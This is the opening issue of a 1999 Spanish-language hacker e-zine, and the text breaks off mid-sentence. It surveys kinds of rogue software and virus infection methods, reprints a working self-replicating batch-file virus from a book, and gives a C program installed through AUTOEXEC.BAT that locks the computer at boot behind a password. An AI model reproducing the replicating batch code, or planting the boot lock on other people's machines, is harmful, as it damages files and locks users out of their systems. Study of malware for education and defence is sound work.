                      

                            COLOMBIA COFFEE HACKERS
                              
     ******      *********************************************     ******
   *******  *                                                    *******  *              
  ********  **     ########       ########      #### ####       ********  **   
 ********  ****   #########      #########      #### ####      ********  ****
********  ******  ####           ####           #### ####     ********  ******     
*******  *******  ####           ####           #########     *******  *******  
*******  *******  ####           ####           #########     *******  ******* 
*******  *******  ####           ####           #### ####     *******  *******
 *****  *******   ########## @@@ ########## @@@ #### #### @@@  *****  *******   
  ***  *******     ######### @@@  ######### @@@ #### #### @@@   ***  *******    
   *  *******                                                    *  *******        
     ******      *********************************************     ******  
                                  
                             COLOMBIA COFFEE HACKERS

                                        
                                    E-ZINE # 0                      

                                   JUNIO DE 1999

                                  E-ZINE DE PRUEVA



                           NUESTRO WEB: HTTP://FLY.TO/CCH


                       NUESTRO EMAIL: colcohackers@samerica.com



NOTA: COLOMBIAN COFFEE HACKERS NO SE HACE RESPONZABLE DEL INADECUADO USO DE LA
INFORMACION QUE A CONTINUACION SERA EXPUESTA.          








@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@                                  INDICE                                    @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
            
                                                                  
           ARTICULO                                        AUTOR
          
      1. PRESENTACION.................................... BLACKWOLF
           
      2. VIRUS INFORMATICOS.............................. BLACKWOLF
                          
      3. SEGURIDAD EN NUESTRO ORDENADOR ................. K@LVO

      4. CODIGO PENAL ................................... BLACKWOLF
           
      5. DESPEDIDA....................................... BLACKWOLF


             



@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@                             1. PRESENTACION                                @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
     



HOLA AMIGO:


BINVENIDO AL COLOMBIA COFFEE HACKERS


Seguramente se preguntaran que rayos es esta vaina???

Solamente te podemos decir que es el fruto de la demencia de unos
locos novatos y entusiastas del hacking que pensamos que una grandiosa
manera de aprender mucho mas y conocer gente que realmente experimentada con 
la cual poder interactuar e intercambiar conocimientos e informacion era la
de crear un sitio en el cual se pudieran reunir aficionados al hacking
como nosotros y hackers de verdad.

EN NINGUN MOMENTO PRETENDEMOS PRESUMIR QUE NOTROS LOS FUNDADORES POR EL
SOLO HECHO DE HABER CREADO EL C.C.H. NOS CONSIDERAMOS UNOS SUPER HACKERS,
SINO QUE HEMOS EMPRENDIDO ESTA AVENTURA PORQUE QUEREMOS APRENDER DE TODOS
AQUELLOS QUE  DESEEN COMPARTIR CON NOSOTRO Y TODAS LAS DEMAS PERSONAS QUE
TAMBIEN QUIEREN APRENDER ,SUS VALIOSOS CONOCIMIENTOS Y HALASGOS.

Prendemos que el C.C.H. se convierta en la escula de la cual salgan muy
buenos hackers.

Como somos unos novatos lo mas seguro es que nuestros articulos no son
muy buenos pero como la idea rea crear algo primero para luego con la
ayuda de todos ustedes hacer de este ezine si no el mejor uno de los
mejores por lo que queremos recibir sugerencias para el proximo ezine
que sabemos que sera muy bueno,y esperamos que nos escriban bastantes
articulos para que sean aqui publicados.

Ademas si desan ingresar al C.C.H. solo tienen que enviarnos un mail a
nuestro correo para asi comensar a poner sus nobres en el listado oficial
de integrantes del C.C.H.
Como luchamos por el libre acceso a la informacion se permite la libre
distribucion del ezine siempre y cuando sea solo con propositos didacticos
y no de ninguna otra indole.

La pagina oficial del C.C.H. ES:

HTTP://FLY.TO/CCH

nuestro correo oficial:

colcohackers@samerica.com


y ya dejemos de hablar chachara y vamos a la accion.

Estamos en contacto en nustro proximo ezine.




POR: BLACKWOLF







@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@                           2. virus informaticos                            @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


POR: BLACKWOLF



Este primer articulo fue escrito con el fin de familiarizar con algunos
terminos y dilucidar algunas dudas sobre un tema de los virus que tiene 
mucha importancia en el medio en el cual nos desenvolvemos.

Primero que que es un virus??
Un virus es un programa como cualquier otro. la unica diferencia es que
estos tienen lineas de comandos relativamente letales para el pc, todo
depende de la malicia de su creador.

¡VALLA DESCUBRIMIENTO!!!! y eso que me importa a mi??

Pues lo que pasa es que puede llegar el dia que te ataque uno de ellos
y no seria una buena actitud de un hacker el ignorar que tipo de virus
ataco su valiosa informacion y como poderse proteger.

NOTA: ESTE ARTICULO FUE ESCRITO CON FRAGMENTOS DE EL LIBRO:
                "VIRUS INFORMATICOS"

este articulo se dividira de la siguiente manera:

1. Tipos de software rogue

2. Ejemplo de un batch file virus

3. Tipos de virus informaticos

4. Metodos mas usados por los virus para la infeccion

5. medidas de seguridad


1. tipos de software rogue:

Primero lo primero , que es software rogue???
Todo software rogue supone una seria amenaza  para la integridad de los
datos informaticos. Por lomenos hay nueve familias diferentes de software
rogue que pueden encontrarse en elmercado de los pc.Los virus informaticos
aunque tienen muy mala fama , no son, de ningun modo, los mas dañinos.

A. Bug-Ware

Bug.Ware es nombre dado a programas informaticos legales diseñados para
realizar conjuntos de funciones concretas.
Debido a una inadecuada comprobacion o a una programacion enrevesada, causan
daño al hardware o al software del sisteme.Muy a menudo, los usuarios finales
o la prensa informatica denuncian esos daños como resultado de la actividad
de virus informaticos.Los programa bug-ware no son, en absoluto,programas
rogue.simplemente son fragmentos de codigo mal implementados que, debido a
fallos logicos internos, dñan el hardware o inutilizan los datos del usuario
de forma accidental.

B. Caballo de troya

El abuelito del sofware rogue <<popular>>, el caballo de troya, es llamado
como el caballo de troya de la mitologia griega.
Los programas caballo de troya parecen ser aplicaciones utiles, corrientes
y molientes, mientras que en realidad contienen una o mas ordenes informaticas
destructivas. Los usuarios que inocentemente ejecutan programas caballo de
troya son engañados a menudo por <<enlaces>>, o disfraces, bien diseñados que
les inducen a creer que estan usando aplicaciones normales.
Estas charadas continuan hasta que se disparan los programas escondidos en los
caballo de troya. Casi todo el software rogue se entrega a los usuarios finales
como caballos de troya, incluidos los virus informaticos.

C. Camaleones

Un pariente cercano del caballo de troya, los camaleones actuan como otros
programas parecidos, de confianza, mientras que en realidad estan aciendo
alguna clase de daño. Cuando estan adecuadamente programados, los camaleones
pueden simular todas las acciones de programas de aplicacion legitimos, de
forma parecida a los programas de demostracion, los cuales son simulaciones
de programas reales de software.

D. Bombas de software

Con mucho, el codigo rogue mas facil de producir y perfeccionar, y durante
cierto tiempo el mas popular entre programadores de rogue, es la bomba de
software. Las bombas de software sencillamente detonan a pocos instantes de
ser lanzadas -sin timbres, sin silbatos-. Con minima fanfarria y practicamente
ningun pretexto, y ciertamente sin reproduccion virica, las bombas de software
se corresponden con su nombre , explotan por inpacto y vuelan todos los datos.

E. Bombas logicas

Las bombas logicas son programas que ejecutan ordenes informaticas destructivas
condicionalmente, dependiendo del estado de variables ambientales.Por ejemplo,
una bomba logica podria controlar los registros de nominas de un esfuerzo por
esperar a que ocurra el despido del programador de la bomba logica.La bomba logica
podria ser programada para estallar (borrar o volver a calcular incorrectamente
los registros de nominas, reformatear discos o realizar otras acciones analogamente
destructivas) cuando los registros de la nomina del programador dejen de aparecer
durante tres semanas consecutivas.

F. Bombas de tiempo (de relojeria)

Las bombas de tiempo son programas que ejecutan ordenes informatica destructivas
condicionalmente dependiendo del estado de variables ambientales, relacinadas
con numeros o con el tiempo. Las bombas de tiempo son iguales tecnicamente a las
bombas logicas; sin embargo, la particularidad de sus horarios ambientales les
ha dado su clasificacion propia. Por ejemplo, las bombas de tiempo se programan
para estallar tras una cantidad fija de ejecuciones (al menos dos ejecuciones),
para estallar en una fecha determinada(tal como 1 de abril o viernes 13) o para
estallar en un momento determinado del dia (tal como medianoche).

G. Reproductores

Un primo del virus, los reproductores (conocidos popularmente como conejos)
se reproducen continuamente hasta que haya insuficiente espacio de disco o de
memoria para almacenar su abundante desendencia. Despues de que sea creado un
clonico es lanzado por su progenitor; el clonico hijo entonces empieza a crear
y lanzar otros clonicos, los cuales, a su vez, continuan el ciclo hasta el infinito.
El proposito es agotar los recursos del sistema , especialmente en un entorno
multiusuario, interconectado, hasta el punto en que el sistema principal no puede
continuar el procesamiento.La diferncia entre reproductores y virus informaticos
es que los reproductores no atacan a los archivos de datos del usuario ni implican
normalmente una relacion parasita con tales archivos.Los reproductores son programas
autosuficientes, autonomos.

H. Gusanos

Confundidos regularmente con los virus informaticos, los gusanos son programas
que viajan a traves de un sistema informatico interconectado, de ordenador a
ordenador, sin dañar necesariamente al hardware o al software.Los gusanos pueden
reproducirse como un medio para continuar el trabajo por la red, pero generalmente
lo hacen asi solo cuando es necesario y cuando estan programados convenientemente.
a un costo reducido para el gasto del sistema.
Los gusanos viajan a traves de ordenadores anfitriones de la red en secreto,
reuniendo informacion (posiblemente contraseñas o documentos) o dejando mensajes
burlones, misteriosos, antes de trasladarse. A menudo los gusanos borran todos los
vestigios de sus visitas con objeto de permanecer invisibles ante los SysOps (system
operator) de la red.

I. Virus

Los virus informaticos son los favoritos del archivo de delincuentes.
Los virus informaticos son programas que modifican otros programas para incluir una
copia ejecutable y posiblemente alterada de ellos mismos.Faciles de crear y dificiles
de detectar ( mas adelante veremos un ejemplo de ello), los virus contaminan los
sistemas mediante la insercion de copias de ellos mismos, añadiendo clonicos o creando
cubiertas alrededor de archivos ejecutables.LLos virus logrados expertamente no
cambiaran la fecha la fecha del archivo o marcas de tiempo ni alteraran atributos,
tamaños o totales de control.

2. Ejemplo de un batch file virus

he aqui el codigo batch file virus, almacenado en el disco original de Virus 
informaticos como BFV.BAT con una explicacion de sus funcionamientos internos:

 echo El Batch File Virus (BFV:BAT)
 echo Del ¨manual del virus informatico¨ de Osborne/McGrawHill
 echo Este programa demuestra como operan los virus
 echo informaticos y lo facil que es crear un virus informatico
 echo El directorio actual es:
 cd
 echo 
 echo !AVISO! !ESTE PROGRAMA INFECTARA TOD0S LOS ARCHIVOS .BAT
 echo DEL DIRECTORIO ACTUAL! !LOS ARCHIVOS .BAT INFECTADOS 
 echo INFECTARAN OTROS ARCHIVOS .BAT! !USTED SE ARRIESGA A LA
 echo DESTRUCCION TOTAL DE SUS ARCHIVOS .BAT AL EJECUTAR ESTE
 echo PROGRAMA!
 echo 
 echo Por favor, haga un backup de todos sus archivos BATCH
 echo antes de ejecutar este programa. El no hacer dicho
 echo backup antes de ejecutar este progrma causara
 echo probablemente la perdida total de los archivos BATCH. 
 echo Si no sabe hacer el mencionado backup ! no ejecute este
 echo programa!
 echo 
 echo Pulse cualquier tecla para confirmar que entiende el
 echo aviso anterior o pulse ^c para cancelar la ejecucion de
 echo este programa
 pause > nul
 cls 
 echo !AVISO! !USTED HA ELEGIDO EJECUTAR EL PROGRAMA DEL VIRUS 
 echo DE LOS ARCHIVOS BATCH! ESTA ES SU ULTIMA OPORTUNIDAD DE
 echo CANCELAR LA EJECUCION DE ESTE PROGRAMA!!
 echo Pulse cualquier tecla para ejecutar el Batch File Virus
 echo o pulse ^c para cancelar
 pause > nul
 cls
 echo el directorio actual es:
 cd
 echo Infectando todos los archivos .BAT de este dirctorio
 ctty nul
 for %% in (*.bat) do copy %%f + dfv.bat
 ctty con
 cls
 echo Todos los archivos .BAT de este directorio han sido 
 echo infectados con el Batch File Virus. La mayoria, sino
 echo todos, de los archivos .BAT infectados con el Batch
 echo File Virus infectaran a otros archivos .BAT cuando se
 echo ejecuten. Para erradicar el Batch File Virus, restaure
 echo sus archivos .bat a partir de copias certificadas de
 echo backup
 echo Fin de BFV.BAT 

Quite todos los mensajes de aviso del Batch File Virus y todas sus 
indicaciones de entrada (el texto que sigue a cada instrucción ECHO) y 
solo queda el nucleo del codigo virico:

For %%f in (*.bat) do copy %%f + bfv.bat

Esta unica linea del codigo de archivo batch es todo lo que se necesita 
para crear un virus informatico activo. Este codigo de programa ordena a 
una computadora que utilice MS-DOS añadir una copia del archivo BFV.BAT 
a todos los archivps .BAT (batch) almacenados en el directorio actual.
Los archivos batch son archivos de texto, llenos con una lista de ordenes 
MS-DOS Se usan para inplementar programas de menu, para reducir el numero 
de pulsaciones necesarias cuando se invocan secuencias de ordenes  de uso 
frecuente y para muchos otros usos .Pueden ser escritos por cualquiera con 
algun conocimiento de las ordenes del MS-DOS y es probable que su computadora 
contenga docenas de archivos batch utilizados para  automatizar importantes 
funciones del sistema. Muchos programas de software utilizan archivos batch 
para cargar y ejecutar los programas.
Una vez que hayan sido utilizado el Batch File Virus, todos los archivos .BAT 
del directorio actual levaran una copia del programa BFV.BAT. De la misma forma 
que se grapa  (adjunta) un papel a la parte posterior de otro papel, las ordenes

For %%in (*.bat) do copy %%f + bfv.bat

Caunas que las computadoras <<grapen>> una copia del Batch File Virus a 
cada .BAT que se encuentre en el directorio actual tal como se muestra en 
la figura 1-1. Por tanto, en vez de volver normalmente al mensaje indicador 
de la orden de MS-DOS (A> o C> ), al terminar la ejecucion, los archivos 
*.BAT infectados encuentran unido el codigo Batch File Virus y lo ejecutan. 
Lo sigiente que usted conoce es que el Batch File Virus se ha unido incluso 
a mas archivos .BAT.Cuando se ejecuta cualquiera de los de los archivos 
*.BAT infectados, tambien ejecutara el codigo virico añadido BFV.BAT y 
continuara el ciclo de actividad virica. Con el tiempo, ningun archivo Batch
funcionara correctamente, si es que funciona. El programa ejemplo Batch File 
Virus demustra la regla central de la programacion del virus informatico: se 
reproduce en otros archivos ejecutables. Mediante la conversion de programas 
normales, no infectados, en transmisiones viricas, las personas que desarrollan 
el virus infoematico se aseguran de que sus programas seran provechosos y que 
se multiplicaran. Mientras que ejecute un archivo infectado, una vez que ese 
unico archivo infectado haya sido lanzado se infectan rapidamente otros archivos. 
Un sistema informatico que contenga un archivo infectado por virus hoy, seguramente 
mañana llevara docenas.

Figura 1-1

A.>Estos son archivos .BAT que es probable que todo computador tenga antes 
de la infeccion del Batch File Virus:

        &&&&&&&&&&&    &&&&&&&&&&&&&&    &&&&&&&&&&&    &&&&&&&&&&&
        & OBF.BAT &    & INSTALL.BAT&    & RUN.BAT &    & BFV.BAT &  
        &&&&&&&&&&&    &&&&&&&&&&&&&&    &&&&&&&&&&&    &&&&&&&&&&&    
 
B.>Estos serian los mismos archivos momentos despues de la infeccion por 
parte del Batch File Virus, incluyendose a el mismo:

        &&&&&&&&&&&    &&&&&&&&&&&&&&    &&&&&&&&&&&    &&&&&&&&&&&
        & OBF.BAT &    & INSTALL.BAT&    & RUN.BAT &    & BFV.BAT &  
        &&&&&&&&&&&    &&&&&&&&&&&&&&    &&&&&&&&&&&    &&&&&&&&&&&
        & BFV.BAT &    &   BFV.BAT  &    & BFV.BAT &    & BFV.BAT &
        &&&&&&&&&&&    &&&&&&&&&&&&&&    &&&&&&&&&&&    &&&&&&&&&&&

3. Tipos de virus informaticos

A. BSIs (CONTAMINADORES DE SECTOR DE ARRANQUE)

Virus informaticos que se especializan en alterar, sorprender o infectar
 de algun modo los archivos almacenados en el registro maestro de arranque 
son llamados a menudo contaminadores del sector de arranque Para los 
programadores rogue, la infeccion de los sectores de arranque de disco 
proporciona numerosas ventajas sobre todos los otros medios de infeccion.
Lo primero y principal es que los contraminadores de los sectores de arranque
consiguen un nivel de mano ferrea en el control del sistema porque son 
cargados inmediatamente al arrancar el sistema, cuando normalmente se cargan
los archivos del sistema operativo.Esto significa que los contaminadores de 
los sectores de arranque se aseguran el ser los primeros programas ejecutados
durante cualquier sesion  informatica.

B. CPIs (CONTAMINADOR DE PROCESADOR DE ORDENES)

Virus informaticos diseñados para infectar shells de ordenes centrales, como 
COMMAND.COM. Ofrecen una ventaja distinta a los programadores rogue: como muchas 
ordenes introducidas en el teclado pasan a traves del programa COMMAND.COM, los 
contaminadores del procesador de ordenes tiene la ventaja de examinar la 
interaccion entre usuarios y sus computadoras.Pueden explotar las oportunidades
 para esconderse trass accesos normales de disco mientras que se ejecutan 
ordenes internas COMMAND.COM (como DIR o COPY).

C. GPIs (CONTAMINADORES DE PROPOSITO GENERAL)

Virus que se contenta con infectar cualquier archivo ejecutable.
Con independencia de si sus archivos de programas destinatarios son utilizados 
como diskcopy o aplicaciones como hojas de calculos y procesadores de texto, 
los GPIs pueden infectarlos y convertirlos en transmisores de virus troyanos.

D. MPIs (CONTAMINADORES MULTIPROPOSITO)

Virus creados para cambiar algunos o todos los atributos infecciosos de los 
contaminadores de sector  de arranque, procesador de ordenes y de prposito general.

E. FSIs (CONTAMINADORES DE ARCHIVO ESPECIFICO)

Virus que que atacan a un numero fijo de y a un tipo fijo de archivos, en otras 
palabras son misiles crucero viricos programados para buscar y destruir los 
archivos y propiedades del blanco deseado.

F. MRIs (CONTAMINADORES RESIDENTES EN MEMORIA)

Los contaminadores de sector de arranque y de procesador de ordenes pueden 
clasificarse tambien como contaminadores residente en memoria puesto que ambos 
tipos viricos permanecen cargados y activos en la memoria del computador cuando 
se ejecutan. Puesto qu estan siempre cargados y activos pueden interferir en la 
mayoria de las actividades informaticas.

4. Metodos mas usados por los virus para la infeccion

No es suficienten decir que los virus informaticos infectan sus computadoras;
cada virus informatico tiene su propia forma especial de arrebatarle el control
a los archivos normales de su pc.
Hay seis metodos populares empleados por la mayoria de los virus informaticos 
para adueñarse del control de los archivo ejecutables normales:
 
A. Añadidura
B. Insercion
C. Reorientacion
D. Sustitucion
E. La cubierta virica 

Aunque cietamente ecxisten otras formas de corrupcion de sistemas (tal como el 
metodo de adañidura usado por el batch file virus presentado anteriormente),
estas son, con mucho,las tecnicas dominantes usadas por los creadores de 
programas rogue.

A. Añadidura

Los virus que agregan el codigo virico al extrmo final de los archivos 
ejecutables de programas usan el sistema de infeccion por añadidura.Los
archivos ejecutables anfitriones son modificados para que, cuando se ejecutan,
el control del programa se pase primero a su codigo virico añadido, como se
muestra en la figura A-1.Los primeros de la figura indican la secuencia de 
acontecimientos como ocontecimientos como ocurririan durante le ejecucion de 
un programa infectado. Observe como la infeccion alterna la secuencia. El
codigo virico añadido se activa y, despues de finalizar con exito sus siniestras
operaciones, devuelve el mando a los archivos anfitriones, los cuales continuan 
ejecutandose como si no hubiese ocurrido nada.


------------------------------------ A-1 -----------------------------------------                

                 Un programa infectado por un virus añadido


                      --------------------------------  
                       Programa antes de la infeccion
                      --------------------------------
    
                               &&&&&&&&&&&&&&&
                               & PROGRAM.EXE &
                               &&&&&&&&&&&&&&&   

                      Tamaño del archivo = 10240 bytes
                                                 
                     ----------------------------------
                      Programa despues de la infeccion
                     ----------------------------------  
                           
                              &&&&&&&&&&&&&&&&&
                              &  PROGRAM.EXE  &
                              &&&&&&&&&&&&&&&&&
                              & CODIGO VIRICO &
                              &&&&&&&&&&&&&&&&&

           Tamaño del archivo: 10240 bytes + tamaño del codigo virico

----------------------------------------------------------------------------------

Dependiendo del tipo de archivo a infectar, los virus informaticos de
añadidura tienen que emplear diferentes tecnicas para desviar el control de sus
programas anfitriones en elmomento de la ejecucion.

B. Insercion

Los virus informaticos que situan su codigo de programa directamente dentro
de un codigo no utilizado y de segmentos de datos de programas ejecutables
utilizan la infeccion por insercion para controlar los archivos. LOs archivos
anfitriones son modificados de forma muy parecida a la de las infecciones por
añadidura, exepto que el codigo virico esta ahora dentro de los archivos
ejecutables de destino en lugar de agregados a los finales de los archivos tal 
como se muestra en la figura b-1

------------------------------------ B-1 -----------------------------------------

                Un programa infectado por un virus añadido


                      --------------------------------  
                       Programa antes de la infeccion
                      --------------------------------
    
                               &&&&&&&&&&&&&&&
                               & PROGRAM.EXE &
                               &&&&&&&&&&&&&&&   

                      Tamaño del archivo = 10240 bytes
                                                 
                     ----------------------------------
                      Programa despues de la infeccion
                     ----------------------------------  
                           
                          &&&&&&&&&&&&&&&&&&&&&&&&&&
                          & PROGVIRAL  PROGRAM.EXE &
                          &&&&&&&&&&&&&&&&&&&&&&&&&&
                              
                       Tamaño del archivo = 10240 bytes 

----------------------------------------------------------------------------------

los virus de insercion son mas dificiles de crear que los de añadidura,
principalmente porque el tamaño del codigo virico tiene que ser mantenido al
minimo.

C. Reorientacion

Un interesante y avanzado enfoque empleado por autores viricos sofisticados
es el de la infeccion por reorientacion. Bajo este esquema se introducen virus 
centrales (centro de control) en una o mas posiciones fisicas de discos, tales
como areas de particion de disco, sectores <<malos>> (sectores de disco marcados
como dañados e inutilizables) o quiza como archivos escondidos ordinarios.
Estos virus << maestros >>, utilizando las tecnicas de añadidura o insercion,
implantal diminutos trabajadores viricos entre archivos ejecutables normales.
Estos peones viricos se activan cuando sus anfitriones infectados son ejecutados
reorientando el flujo del programa mediante la emision de <<llamadas>>
procesos viricos (quiza produciendo mas errores) y luego descargarse y devolver
el control a los programas anfitriones.

D. Sustitucion

El metodo de infeccion mas tosco y lento emleado por los creadores viricos
es, con diferencia, la sustitucion de archivos ejecutables destinatarios por 
operarios viricos. Los virus de sustitucion no infectan realmente a los archivos 
ejecutables, sino mas bien al sistema en que residen. Se escribe sobre los
archivos destinatarios (borrados y sustitudos por codigos viricos en lugar de 
tener instrucciones viricas añadidas o insertadas en ellos como se muestra en 
la figura D-1.

------------------------------------ D-1 -----------------------------------------

                Un programa infectado por un virus añadido


                      --------------------------------  
                       Programa antes de la infeccion
                      --------------------------------
    
                               &&&&&&&&&&&&&&&
                               & PROGRAM.EXE &
                               &&&&&&&&&&&&&&&   

                      Tamaño del archivo = 10240 bytes
                                                 
                     ----------------------------------
                      Programa despues de la infeccion
                     ----------------------------------  
                           
                                 &&&&&&&&&&&&&
                                 & VIRUS.EXE &
                                 &&&&&&&&&&&&&
                              
                       Tamaño del archivo = 10240 bytes 

----------------------------------------------------------------------------------

Esta tactica de furza bruta tiene sus beneficios, por lo que respecta a
los programadores rogue, en que cada sustitucion virica sirve para eliminar
archivos de programas validos, reduciendo rapidamente los sistemas destinatarios
a hardware sin valor.

E. La cubierta virica

Hablando en terminos viricos, esta no es realmente una tecnica de infeccion,
sino mas bien un metodo de supervivencia posinfeccion empleado por las 
estructuras viricas mas sofisticadas.
El armazon virico es, en la practica, tan restrictivo como suena; envuelve
completamente con operarios viricos todas las funciones basicas de una 
computadora. Se interceptan y enmascaran las acciones que de alguna forma 
podrian revelar la existencia o situacion, o amenazar la supervivencia, de los 
virus instalados. Los listados de directorios son bloqueados y analizados y las
presentaciones resultantes son modificadas para que parezca que los archivos
infectados tienen sus tamaños normales de los archivos, mientras que en realidad
llevan unos cuantos kilobytes mas de codigo virico.



POR: BLACKWOLF




@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@                        3. SEGURIDAD EN NUESTRO ORDENADOR                   @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 

                       


                           SEGURIDAD EN NUESTRO ORDENADOR.
                         ±±±±±±±±±± ±± ±±±±±±±± ±±±±±±±±±±±±


por: K@LVO.



ÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞ    
Þ NOTA DEL AUTOR:no me hago responsable del mal uso de la información aquí Þ 
Þ dada ya que es Solo para ilustrar y enseñar  a quien lo lea.             Þ                                                                                               
ÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞÞ

En este articulo voy a explicar un programa en c con el que pueden proteger su 
computador de gente que quiera usaarlo sin su permiso y podrán configurar a su 
manera por si no tienen un compilador de c me pueden mandar un mail con la clave 
que quieran que le ponga a su computador y se los pondré, el programa debe ser 
compilado en MS-DOS porque sobre este en quien funciona, el programa se ejecuta 
automáticamente cuando se esta iniciando güindows  de tal manera que empieza con  
DOS que no es que se inicie del todo porque  lo que se iniciara es nuestro 
programa que no termina hasta que no se ponga la clave correcta al programa, y 
por mas que se trate de entrar a DOS tampoco entrara, sino que se iniciara nuestro 
programa. Este programa también te ayudará a comprender ciertos virus y que tu 
podrás eliminar con una simple miradita que luego explicare...

Bueno, ahora si les paso el programa. la clave por defecto será "jazz". Claro 
que la pueden modificar a su gusto, pero antes explico a los que no saben ni 
pío de C, que lo que va ha ir entre "/*" y "*/" son notas del programa que no 
afectan el mínimo  y que explican la sentencia que tienen al frente, la verdad, 
el programa es muy sencillo, su nombre es "virus jeje.exe versión II". Estoy 
desarrollando  uno mejorado (virus jeje.exe II deluxe) y cuando lo tenga les diré. 
Por mí, ya estoy trabajando en esa versión.  ahora les pasare el programa orientado 
paso a paso para los que no entienden de C.


-----------------------------------VIRUSJEJE.EXEII---------------------------------

 /*este es el virus dise¤ado por kalvo y nadie llamado jeje2*/
#include <stdio.h>                                  /*definición de librerias*/
#include <conio.h>
#include <GRAPHICS.H>
#include <time.h>
#include <dos.h>
int main(void)
{

  time_t timer;
  struct tm *tblock;  
  /*definición de variables, el tiempo será usado en la versión deluxe*/
  int n, i = 0;
  int  font;
struct {
   char texto[20];
} circulo[10];
    clrscr( );

    gotoxy (15,3);
    textcolor(15);
    textbackground(13);
    cprintf( "acabas de entrar en el virus jeje versión 2.0...\n");
    /* titulo,centrado, principal */

    timer = time(NULL);
    tblock = localtime(&timer);
    gotoxy (16,4);
    cprintf("la fecha y hora son: %s", asctime(tblock));  
    /*muestra la fecha y la hora que contiene el bios */                                                                                           
    sound(300);
    delay(500);
    nosound( );
    sound(250);      
/*oooooooooooooooooooooooooooooooooooooooooooooooooo
	       sonido en forma de sirena
oooooooooooooooooooooooooooooooooooooooooooooooooooo*/
    delay(500);                                                               
    nosound( );                                                                                                                    
    sound(300);          
    delay(500);
    nosound( );
    sound(250);
    delay(500);
    nosound( );
    sound(300);
    delay(500);
    nosound( );
    sound(250);
    delay(500);
    nosound( );
    sound(300);
    delay(500);
    nosound( );
    sound(250);
    delay(500);
    nosound( );
    gotoxy(17,5);
    cprintf("\nentre el codigo:");
    textcolor(0);        /* esto es para que la clave no se vea cuando la pongamos */
    textbackground(0);         
    cscanf("%s", circulo[i].texto);
    while (circulo[i].texto[0] !='j' || circulo[i].texto[1] !='a' || circulo[i].texto[2] !='z' || circulo[i].texto[3] !='z') {
    /* nota: en la anterior linea esta partida en dos partes por puntos suspencivos */
    /* borralos y une en una solos linea la primera parte con la seguna */
    /* trata de utilizar tu inteligencia hacker en la parte de arriba porque aquí es donde 
    tu puedes poner la clave que se te plazca,  puedes usa hasta 20 caracteres, si quieres 
    mas tienes que ponerle mas a la variable "texto" */
                         
    textcolor(11);
    cprintf("\n ¡¡¡la vas cagando!!!");  
    /* mensaje que sale cuando la clave es errónea  */
    ++i;   /*repetición en la sentencia */
    extcolor(15);
    textbackground(13);
    cprintf("\nentre el codigo:"); /*ya explique que es esto */
    textcolor(10);
    textbackground(10);
    cscanf("%s", circulo[i].texto);
}
clrscr( );
}


-------------------------------FIN DELJEJE.EXE VER II---------------------------------

Bueno, ya tememos el programa como tal. Solo hay que compilarlo, grabarlo y 
ejecutarlo a ver si quedo bueno y luego reiniciar al computador para que el 
compilador se encargue de construir el punto exe que quedara en  el sitio 
donde hallamos grabado el "CPP" (extensión de los ARCHIVOS de C, no de los 
programas) debemos bautizar el programa con el nombre de "jeje".

Como ya tenemos el programa  en el directorio donde se guardan los archivos 
de C, entonces lo ejecutamos para probarlo, dando claves falsas y la real 
para ver si quedo bien. Ahora viene lo interesante, que es modificar el 
autoexec.bat para que nuestro programa se inicie primero que le güindows o 
dos.

Lo primero que les advertiré, es que tengan mucho cuidado al manipular 
este archivo por que este es el que inicia güindows y es el que lo hace 
correr de tal manera que si lo dañan pueden tener problemas por lo que 
recomiendo que hagan una copia de autoxec.bat en otro directorio del 
computador por pura seguridad, si lo dañan, al final de este escrito 
explicare como arreglarlo.

Ahora seguiremos con la instalada:

1.hacer una copia del programa jeje.exe en C:\ (esto es para que podamos 
llamar el virus fácilmente)  .
2.hacer una copia del autoexec.bat que se encuentra en la unidad C:\ a 
cualquier directorio o carpeta que memoricemos.
3.abrir una ventana de DOS  y cituerse en C:\ y escribir: EDIT UTOEXEC.BAT.
4.estando allí nos situamos en el renglón donde dice: mode......(lo que 
sea)..... 
5.debajo de este debe haber otro mode, nos situamos en el renglón siguiente 
a este y damos <enter> de tal manera que este renglón se baje un renglón 
dejando el que ocupaba anteriormente en blanco.6.nos situamos en el renglón 
que ahora esta en blanco y digitamos: jeje.exe
7.luego vamos al menú archivo y seleccionamos la opción guardar y luego nos 
salimos.
8.reiniciamos el computador para comprobar que el programa aya quedado bien 
instalado, sabemos que lo quedo porque nos pedirá el código para poder 
acceder a güindows.

Nota: si todo lo hacen como lo explique no habrá problemas pero si modifican 
en lo mas mínimo el AUTOEXEC.BAT con algo distinto a lo que mencione se les 
puede dañar el computador .Pero por eso fui precavido y les pedí que hicieran 
una copia en algún otro subdirectorio de su computador del AUTOEXEC.BAT, en 
caso que el computador no funcioneno hay de que alarmarse porque solo es que 
hagan un disco de inicio, entren a la unidad de HD (C:\) y entren donde 
guardaron el AUTOEXEC.BAT original y lo copian a C:\ y reinicien su PC. Si 
